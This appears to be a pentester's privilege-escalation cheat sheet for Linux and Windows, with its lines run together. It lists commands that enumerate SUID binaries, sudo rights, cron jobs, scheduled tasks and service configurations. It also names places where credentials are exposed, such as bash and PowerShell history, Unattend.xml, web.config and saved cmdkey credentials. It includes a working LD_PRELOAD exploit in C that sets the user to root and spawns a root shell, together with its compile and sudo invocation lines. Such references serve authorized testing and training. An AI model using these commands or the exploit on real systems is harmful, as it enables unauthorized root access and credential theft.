Privilege Escalation
Enumeration Scripts
Techniques
Kernel Exploits
You can google known kernel exploits.
Vulnerable Software
dpkg -ldir C:\Program FilesUser Privileges
sudo -lfind / -perm /4000 2>/dev/nullfind / -perm /2000 2>/dev/nullfind / -perm /6000 2>/dev/nullwhoami /privwhoami /allScheduled Tasks
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/rootcrontab -lcrontab -eExposed Credentials
cat ~/.bash_historycat /var/www/html/config.phpSSH Keys
LD_PRELOAD
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}gcc -fPIC -shared -nostartfiles -o ./load.so ./ld.csudo LD_PRELOAD=/dev/shm/load.so /opt/script.shWindows
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txtcmdkey /listrunas /savecred /user:admin cmd.exeC:\inetpub\wwwroot\web.configC:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.configschtasks /query /tn vulntask /fo list /vicacls c:\tasks\schtask.batHKLM\SYSTEM\CurrentControlSet\Services\sc qc apphostsvcReferences
Last updated